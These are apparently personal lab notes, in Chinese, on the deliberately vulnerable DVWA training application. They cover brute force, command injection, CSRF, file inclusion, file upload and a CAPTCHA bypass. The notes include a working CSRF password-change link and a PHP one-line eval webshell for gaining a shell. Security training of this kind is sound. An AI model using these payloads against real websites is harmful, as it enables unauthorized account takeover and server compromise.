DVWA 靶场笔记

Brute Force

登录框,Burp抓包,放到Intruder爆破即可,根据响应包的长度得到正确的密码

Command Injection

首先查看源码

请求参数 ip 会直接被拼接到 shell_exec 函数的 ping 命令中

通过构造恶意输入再传递给 shell_exec 函数,进行命令注入攻击

Cross Site Request Forgery (CSRF)

该页面的链接,点击后即可修改掉用户密码,没有任何校验

可以构造恶意网站,诱导受害者点击,即可修改TA的密码

1
2
3
<a href="http://198.18.0.1/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" />
<img src="http://127.0.0.1/tupian.jpg" border="0" width="800" height="600" />
</a>

File Inclusion

存在文件包含漏洞

尝试包含同路径的其他文件

成功包含

File Upload

上传PHP一句话木马

1
<?php @eval($_POST['pass']);?>

蚁剑连上拿到shell

Insecure CAPTCHA

这里先创建Google reCAPTCHA

填入site key与secret key

审计源码可知,当CAPTCHA校验通过后,会进入到step2

Burp抓包修改为step=2即可绕过CAPTCHA校验修改掉密码